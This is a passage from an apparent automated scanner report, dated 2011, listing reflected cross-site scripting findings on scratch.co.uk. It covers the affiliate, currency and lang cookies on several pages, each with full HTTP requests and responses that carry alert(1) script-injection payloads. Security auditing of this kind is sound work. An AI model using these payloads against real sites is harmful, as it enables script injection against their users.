Set-Cookie: lang=ENGa2c6e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef553ccebbf; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGa2c6e"><script>alert(1)</script>f553ccebbf', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71b4"><script>alert(1)</script>7d02a9a5dda was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4"><script>alert(1)</script>7d02a9a5dda; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7d02a9a5dda; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c71b4"><script>alert(1)</script>7d02a9a5dda');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8329"><script>alert(1)</script>563c2da48f5 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd8329"><script>alert(1)</script>563c2da48f5;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: currency=GBPd8329%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E563c2da48f5; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd8329"><script>alert(1)</script>563c2da48f5', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29be1"><script>alert(1)</script>140ac1fb98e was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG29be1"><script>alert(1)</script>140ac1fb98e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: lang=ENG29be1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E140ac1fb98e; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG29be1"><script>alert(1)</script>140ac1fb98e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a13"><script>alert(1)</script>461aa39c4c8 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24334a13"><script>alert(1)</script>461aa39c4c8; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24334a13%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E461aa39c4c8; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:57 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24334a13"><script>alert(1)</script>461aa39c4c8');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.170. http://scratch.co.uk/help/privacy/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff73f"><script>alert(1)</script>74d5790b1ac was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPff73f"><script>alert(1)</script>74d5790b1ac;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: currency=GBPff73f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74d5790b1ac; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPff73f"><script>alert(1)</script>74d5790b1ac', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.171. http://scratch.co.uk/help/privacy/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88308"><script>alert(1)</script>3161139aaf8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG88308"><script>alert(1)</script>3161139aaf8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: lang=ENG88308%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3161139aaf8; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG88308"><script>alert(1)</script>3161139aaf8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef2"><script>alert(1)</script>2ddcfdeb17b was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2"><script>alert(1)</script>2ddcfdeb17b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ddcfdeb17b; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2437cef2"><script>alert(1)</script>2ddcfdeb17b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.173. http://scratch.co.uk/invite-friend/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b24"><script>alert(1)</script>331cb5603ba was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd0b24"><script>alert(1)</script>331cb5603ba;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: currency=GBPd0b24%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E331cb5603ba; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd0b24"><script>alert(1)</script>331cb5603ba', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.174. http://scratch.co.uk/invite-friend/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61860"><script>alert(1)</script>93ea94dc415 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG61860"><script>alert(1)</script>93ea94dc415; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: lang=ENG61860%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E93ea94dc415; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:28:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG61860"><script>alert(1)</script>93ea94dc415', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.175. http://scratch.co.uk/over-18/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94275"><script>alert(1)</script>11d8ef5060b was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394275"><script>alert(1)</script>11d8ef5060b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394275%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11d8ef5060b; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394275"><script>alert(1)</script>11d8ef5060b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.176. http://scratch.co.uk/over-18/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a5e9"><script>alert(1)</script>657c0e10aea was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3a5e9"><script>alert(1)</script>657c0e10aea;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: currency=GBP3a5e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E657c0e10aea; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3a5e9"><script>alert(1)</script>657c0e10aea', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

